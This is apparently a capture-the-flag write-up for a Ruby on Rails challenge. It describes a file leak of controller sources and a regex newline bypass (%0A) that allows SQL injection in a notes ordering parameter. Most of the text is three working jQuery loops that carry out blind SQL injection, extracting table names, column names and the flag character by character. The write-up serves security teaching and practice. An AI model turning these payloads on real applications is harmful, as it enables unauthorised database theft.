can leak any file (if knows the file name)
the server uses ROR (ruby on rails), so in ROR docs there are controller file name in standardization.
apps/controllers/name_controller.rbso I leakedusers_controller.rbandnotes_controller.rb.
- in notes_controller there is an sqli vuln.
def order
order = params[:order]
if order =~ /^(created_at|updated_at|title)$/
order
else
'created_at'
end
endif order =~ /^(created_at|updated_at|title)$/ can bypass via 0xa (\n).
leak table name
for (var i=32; i<=127; i++) {
$.ajax({
type: 'get',
url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20table_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name!='notes'%20and table_name!='users' and table_name!='ar_internal_metadata' and table_name!='schema_migrations' limit 1),4,1))%3D"+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
success: function(e, x, f) {
console.log(f.getAllResponseHeaders());
}
})
}leak column name
for (var i=32; i<=127; i++) {
$.ajax({
type: 'get',
url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name='fl4g' limit 1),1,1))%3D"+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
success: function(e, x, f) {
console.log(f.getAllResponseHeaders());
}
})
}get flag (select F1A6 from fl4g didn't work so I used asterisk)
for (var i=32; i<=127; i++) {
$.ajax({
type: 'get',
url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select * from fl4g),9,1))="+i+"%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
success: function(e, x, f) {
console.log(f.getAllResponseHeaders());
}
})
}